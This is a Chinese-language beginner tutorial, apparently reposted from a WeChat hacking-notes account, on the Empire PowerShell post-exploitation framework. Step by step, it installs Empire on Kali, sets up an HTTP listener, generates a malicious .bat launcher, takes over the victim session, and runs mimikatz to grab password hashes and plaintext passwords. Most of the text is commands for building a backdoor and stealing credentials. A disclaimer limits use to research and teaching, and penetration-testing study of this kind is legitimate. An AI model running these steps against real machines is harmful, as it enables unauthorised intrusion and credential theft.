Empire
是针对Windows平台的,使用PowerShell
脚本作为攻击载荷的渗透测试攻击框架,具有stager
生成提权、权限维持的功能。Empire
无需powershell.exe就能运行power shell
代理的功能,有许多后期漏洞利用模块。类似于msf
。
⚽在kali中安装
在kali中安装很简单,我们只需执行下面命令即可。
sudo apt install powershell-empire
🎨启动服务端
这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell
服务端
powershell-empire server
🎳启动Empire powershell 客户端
powershell-empire client
📢牛刀小试
Empire
的使用方法与msf
的方法相同,先设置监听,生成木马,然后监听反弹代理。输入Listeners
进入监听页面,uselistener
设置监听模式,共有7种模式
-
dbx -
http -
http_foreign -
http_hop -
http_mapi -
http_com -
meterpreter
这里,我们以http
模块为例:
uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行
现在配置完监听模块,我们来看看怎样生成shell. 使用
windows/launcher_bat
模块,来生成恶意shell。
usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行
执行完成上面的命令后,我们的恶意文件已经生成。格式为bat
双击运行后,我们可以看到已经成功得到了会话。输入agents
可以查看连接上的计算机的详细信息。
🧩连接设备
和msf一样,我们需要连接当前在线的设备。interact 设备name
interact V1T86EUN
运行help命令,可以看到具体的帮助文档。由于命令比较多,这里我列举常用的一些命令
进入系统cmd
shell
使用内置的mimikatz抓取hash和密码
mimikatz
设备详细信息
info
🎯总结
empire
模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):Empire框架入门到放弃(一)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论